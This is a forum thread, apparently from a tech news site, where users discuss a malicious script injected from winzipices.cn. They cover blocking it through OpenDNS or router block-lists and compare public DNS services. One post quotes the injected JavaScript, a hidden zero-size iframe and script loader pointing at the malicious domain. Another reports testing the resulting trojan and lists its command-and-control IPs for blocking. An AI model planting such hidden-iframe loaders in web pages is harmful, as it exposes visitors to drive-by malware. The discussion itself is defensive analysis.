Use OpenDNS to block winzipices.cn


Recommended Posts

You just go into your Network adapter settings, click properties, change the DNS server address, reboot your computer.

Thats the simpliest way

If you have a router, change the DNS servers of your router.

Its really easy..

http://www.opendns.com/start

The technology they use is simply amazing.. and it keeps getting better every day. Each day I hear about new improvements or ideas to the backend and frontend of OpenDNS and they are just simply amazing.

I do have a router, but is is connected (like I said above) in a delicate way to the rest of the network. To eliminate a double NAT setup, I currently have my router (Linksys WRT54G) acting as a wireless point (I think is the term) while the modem (SpeedStream 4500) does the routing. Hence, why I am so hesitant to try this.

If I were to try it, it wouldn't have any affect if I did it on an individual computer's DNS, the only way it would do something would be if I changed it on the modem right?

No offense but how? How would this be different from using my ISP's? Can't I already block/filter out tons of stuff with my router?

It's probably be slower than your ISP (It's about 20 times slower than my ISP's DNS server)

I just use dnsmasq (on my WRT54GL) myself.

Does anyone have any details on the malware itself? What browsers does it affect? What exactly does the malware do, etc? Or better yet, can someone upload the actual malware someplace?

The script being injected is winzipices.cn / 2.js (added space so people dont accidently go here) - DONT GO THERE, EVEN THOUGH ITS A JS FILE

The stuff in that JS file (2.js) is this:

document.write("<iframe <iframe src=http://winzipices.cn/2.asp width=0 height=0></iframe>")

5.js is this

if (navigator.systemLanguage=='zh-cn')

{

}

else{

document.write("http://winzipices.cn/5.js");

}

document.write ('<script language="javascript" type="text/javascript" src="http://js.users.51.la/1856986.js"></script>');

"You're already blocking winzipices.cn.

You're blocking Adware sites. This category includes winzipices.cn."

Looks like OpenDNS has already added it to the Adware list.

I am a moderator for OpenDNS and i have added it to the Adware category. Thats why.

I do have a router, but is is connected (like I said above) in a delicate way to the rest of the network. To eliminate a double NAT setup, I currently have my router (Linksys WRT54G) acting as a wireless point (I think is the term) while the modem (SpeedStream 4500) does the routing. Hence, why I am so hesitant to try this.

If I were to try it, it wouldn't have any affect if I did it on an individual computer's DNS, the only way it would do something would be if I changed it on the modem right?

Ahh, this took me a while to figure out. Ok, this makes sense

You are using your WRT54G basically as a DHCP server which uses ad-hoc, the default gateway of your router points to the IP address of your modem. The DNS settings of your router will be the address of your modem. Therefore, if you are able to change the DNS server address of your modem, that would be fine.

But if you dont feel comfortable doing it.. dont.

I dont think it would mess up your setup.

I already use OpenDNS, but as an extra precaution added the listed domains and IP addreses at the SANS site into my router's block-list.

--ScottKin

That works too.

I (Personally) just blocked all access to any .cn site.

I cant read that language.. so I have no use for those kinds of sites.

@Jonathan:

So, I've visited all the above mentioned sites, and the sites in the google search, and the winzipices site itself, executed all the .js files, created a local html and manually added the scripts and I see nothing happening. I did this on a windows 2003 machine on an admin account on IE 6 with its security and privacy settings resetted to the lowest level, without any antivirus, firewall, antispyware, adblocker, DEP, etc.

Scanned my PC but no trojans were found, confirmed this with procmon, procexp, autoruns and rootkitrevealer.

So is there a bug in this bug or am I missing something?

---

Can someone confirm this in their VM, if they're able to get to the actual trojan?

--

Edit: Managed to manually find the links to the actual malware. Seems one needs to have realplayer installed for it to download and execute automatically. Tested the actual malware- it's a trojan that receives and executes instructions via a config file. At this point of time, it didn't seem to perform any malicious commands as the config file didn't contain any. It just downloaded a second file which makes requests to 61.134.37.15:1800.

I'll get RP later and see if I can manage to get the trojan to auto-execute.

--

Btw, I highly recommend blocking 61.134.37.15 and 61.188.38.158 , in addition to winzipices.cn

A good news for AV users is that the majority of them have already added this to their database- except McAfee, Avast and ClamAV.

http://www.virustotal.com/analisis/4e5fead...dea811ea5e41d0b

Edited by [deXter]

@Jonathan:

So, I've visited all the above mentioned sites, and the sites in the google search, and the winzipices site itself, executed all the .js files, created a local html and manually added the scripts and I see nothing happening. I did this on a windows 2003 machine on an admin account on IE 6 with its security and privacy settings resetted to the lowest level, without any antivirus, firewall, antispyware, adblocker, DEP, etc.

Scanned my PC but no trojans were found, confirmed this with procmon, procexp, autoruns and rootkitrevealer.

So is there a bug in this bug or am I missing something?

---

Can someone confirm this in their VM, if they're able to get to the actual trojan?

--

Edit: Managed to find the links to the actual malware. Seems one needs to have realplayer installed for it to run/execute automatically.

Interesting..

I havent personally tested it, as i dont want to get the malware, lol.

@Tem, and others:

You can also use DNS Advantage and ScrubIT.

The basic advantages are:

- Faster browsing

- Site blocking, independent of OS/software

- Content blocking (pornography, etc)

- Automatic protection against phishing

- Automatically fix typos in website names: Eg: Typing yaho.com or gppgle.com will lead you to their correct domains

These public DNS services are free, and generally will continue to remain free.

I personally prefer DNS Advantage as it has many servers worldwide, and particularly, they have a server located very close to where I live.

I don't mean to thread hi-jack...but I want to give this OpenDNS thing a try. What differences will I notice and how do they keep it free is my main questions? Sounds interesting. :)

Difference in page / site load time due to its very large DNS cache

More secure.. you can block adware category, so no more adware sites will ever load.. a malware category is coming soon btw.

Block porn sites too.

Block suspicious responses

Typo corrections

Network shortcuts

OpenDNS keeps it free cause they get revenue from the ads they have from Overture running on the guide / search pages.

Also, they do have paid features, for business who need extra features, but OpenDNS cant provide those for free. and i mean the really big businesses.

@Tem, and others:

You can also use DNS Advantage and ScrubIT.

The basic advantages are:

- Faster browsing

- Site blocking, independent of OS/software

- Content blocking (pornography, etc)

- Automatic protection against phishing

- Automatically fix typos in website names: Eg: Typing yaho.com or gppgle.com will lead you to their correct domains

These public DNS services are free, and generally will continue to remain free.

I personally prefer DNS Advantage as it has many servers worldwide, and particularly, they have a server located very close to where I live.

DNS Advantage is like a cheap knockoff of OpenDNS, they even use the same terminology "dashboard"

I haven't heard one explanation about making sites load faster, I've just heard the claim repeated.

OpenDNS has servers situated strategically at the most well-connected intersections of the Internet. Unlike your ISP, our network uses Anycast routing technology, which means no matter where you are in the world your DNS requests are answered by our closest datacenter. Anycast routing also means that you are automatically routed to our next closest datacenter in the event of maintenance or downtime. This makes your Internet faster and more reliable.

network_map.gif

How we're faster: We have really large caches

Most DNS servers have a small cache. We operate the largest caches in the world (and on the Internet, size matters). This means when you type a website into your address bar, the site loads immediately, instead of making you wait for a small cache to find the answer.

cache.gif

my ISP's DNS server is one hop away and can return uncached entries in around 10ms. That's still not going to make my connection faster though.

And OpenDNS caches are going to expire at the same time as my ISP's caches, unless OpenDNS is ignoring the TTL.

DNS Advantage is like a cheap knockoff of OpenDNS, they even use the same terminology "dashboard"

Maybe, but that doesn't change the fact that they're way faster than OpenDNS (for me). I'm quite surprised that despite being around for so many years, they have such few servers (5, 1 upcoming), while DNS Advantage has so many (14, 3 upcoming).

Node_locations.png

--

Also, I fail to see how OpenDNS's servers are "situated strategically", considering the fact that most of them ('cept one) are located in the US -_-

In any case, a little bit of competition never harmed anyone :)

Edited by [deXter]
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Posts

    • Wow, that could have been dangerous, certainly not ready for these things. They have to be 100% or pretty well close to it. Not that I will see one i doubt, never mind ride in one, they may have them in London, but I doubt they will come to where I live.
    • Nothing kills CMF Phone 2 Pro's successor due to rising memory prices by Hamid Ganji Storage and RAM prices have been rising over the past year, leading to a significant increase in the cost of electronics for customers around the world. Many companies are now revising their plans for upcoming devices due to higher component costs and overall production expenses. CMF is the latest company to cancel the successor to one of its best-selling phones due to rising memory prices. CMF is a sub-brand of Nothing and focuses on making budget smartphones for growing markets. The brand launched the CMF Phone 2 Pro last year with some eye-catching specifications and an affordable price. While many customers may have been waiting for a successor this year, one of the company’s executives has announced that CMF will not release a new smartphone this year. And AI is to blame. As Nothing co-founder Akis Evangelidis announced on X, the company has been working on a successor to the CMF Phone 2 Pro, but with current memory prices, it cannot “build a phone that feels like a genuine step forward at a price that makes sense for CMF.” So, no new CMF phone will be launched this year. Meanwhile, Evangelidis said the company still has several new products in the pipeline, including some in entirely new categories. He added that the Nothing brand will also continue launching new products through 2026. Budget smartphones are among the first victims of the surge in RAM and memory prices, as they have become more expensive to build. The sharp increase in memory costs could also reshape the traditional price ranges associated with budget phones. Apple CEO Tim Cook also recently said that price increases for some of the company’s products are unavoidable because RAM and memory have become significantly more expensive this year. Analysts estimate that the base price of the upcoming iPhone 18 Pro could rise to $1,399 due to current market shortages.
    • Nudge me when they bring back hardware audio acceleration so I can get my EAX 5 back. We've evolved graphics to real-time path tracing, but regressed audio some 15 years back in time with this stupid software audio stack.
    • Ocenaudio 3.19.4 by Razvan Serea  Ocenaudio is a full featured, fast and easy to use audio and music editor. It is the ideal software for people who need to edit and analyze audio files without complications. Ocenaudio also has powerful features that will please more advanced users. To assist ocenaudio development, a powerful toolset of audio editing, analysis and manipulation called Ocen Framework was created. ocenaudio is also based on Qt framework, a well known library for cross-platform development. Cross-platform support ocenaudio is available for all major operating systems: Microsoft Windows, Mac OS X and Linux. Native applications are generated for each platform from a common source, in order to achieve excelent performance and seamless integration with the operating system. All versions of ocenaudio have a uniform set of features and the same graphical interface, so the skills you learn in one platform can be used in the others. VST plugins support Ocenaudio supports VST (Virtual Studio Technology) plugins, giving its users access to numerous effects. Like the native effects, VST effects can use real-time preview to aide configuration. Real-time preview of effects Applying effects such as EQ, gain and filtering is an important part of audio editing. However, it is very tricky to get the desired result by adjusting the controls configuration alone: you must listen the processed audio. To ease the configuration of audio effects, ocenaudio has a real time preview feature: you hear the processed signal while adjusting the controls. The effect configuration window also includes a miniature view of the selected audio signal. You can navigate on this miniature view in the same way as you do on the main interface, selecting parts that interest you and listening to the effect result in real time. Multiselection for delicate editions To speed up complex audio files editing, ocenaudio includes multi-selection. With this amazing tool, you can simultaneously select different portions of an audio file and listen, edit or even apply an effect to them. For example, if you want to normalize only the excerpts of an interview where the interviewee is talking, just select them and apply the effect. Eficient edition of large files With ocenaudio, there is no limit to the length or the quantity of the audio files you can edit. Using an advanced memory management system, the application keeps your files open without wasting any of your computer's memory. Even in files several hours long, common editing operations such as copy, cut or paste happen almost instantly. Fully featured spectrogram Besides offering an incredible waveform view of your audio files, ocenaudio has a powerful and complete spectrogram view. In this view, you can analyze the spectral content of your audio signal with maximum clarity. Advanced users will be surprised to find that the spectrogram settings are applied in real time. The display is updated immediately when altering features such as the number of frequency bands, window type and size and dynamic range of the display. Ocenaudio 3.19.4 changelog: Adds fallback fonts so every language and symbol displays correctly Improves autosave and session recovery stability Improves region navigation and display Fixes a crash when the level meter is used on displays with a scaling greater than 200% Fixes memory corruption when using the silence selection tools Fixes crashes when closing a file while effects are still being processed Fixes a freeze when applying effects to many files at once (macOS) Fixes crashes related to audio devices on Windows Fixes invalid file names when exporting regions whose label is used as the file name Other bug fixes and improvements Download: Ocenaudio 64-bit | Portable | ~40.0 MB (Freeware) Download: Ocenaudio for Linux and Mac OS View: Ocenaudio Homepage | Screenshot Get alerted to all of our Software updates on Twitter at @NeowinSoftware
    • Hasleo Disk Clone 5.8.2.1 by Razvan Serea Hasleo Disk Clone is a free and all-in-one disk cloning software for Windows 11/10/8/7/Vista and Windows Server that can help you migrate Windows OS to another disk, clone one disk to another disk or clone one partition to another location quickly and efficiently. Completely Free Windows Migration and Disk/Partition Cloning Software Migrate Windows from one disk to another without reinstalling Windows, apps. Clone one disk to another and makes the data on 2 disks are exactly the same. Clone a partition to another location without losing any data. Easily adjust the size and location of the destination partition. Convert MBR to GPT or convert GPT to MBR by cloning. Creation of Windows PE emergency disk. Extremely fast cloning speed and multi-language support. Supported OS: Windows Vista/Server 2008 or later, fully compatible with GPT and UEFI. Hasleo Disk Clone 5.8.2.1 changelog: Fixed an issue that caused disk enumeration to fail Fixed an issue where WinPE created under Windows ARM64 26H1 did not work properly Download: Hasleo Disk Clone 5.8.2.1 | 32.3 MB (Freeware) Link: Hasleo Disk Clone Home Page | Screenshot Get alerted to all of our Software updates on Twitter at @NeowinSoftware
  • Recent Achievements

    • Collaborator
      ryansurfer98 went up a rank
      Collaborator
    • Week One Done
      Eurosoft10 earned a badge
      Week One Done
    • One Month Later
      Eurosoft10 earned a badge
      One Month Later
    • One Year In
      Skeet Campbell earned a badge
      One Year In
    • One Month Later
      Sharbel earned a badge
      One Month Later
  • Popular Contributors

    1. 1
      +primortal
      545
    2. 2
      +Edouard
      187
    3. 3
      Michael Scrip
      78
    4. 4
      PsYcHoKiLLa
      75
    5. 5
      neufuse
      71
  • Tell a friend

    Love Neowin? Tell a friend!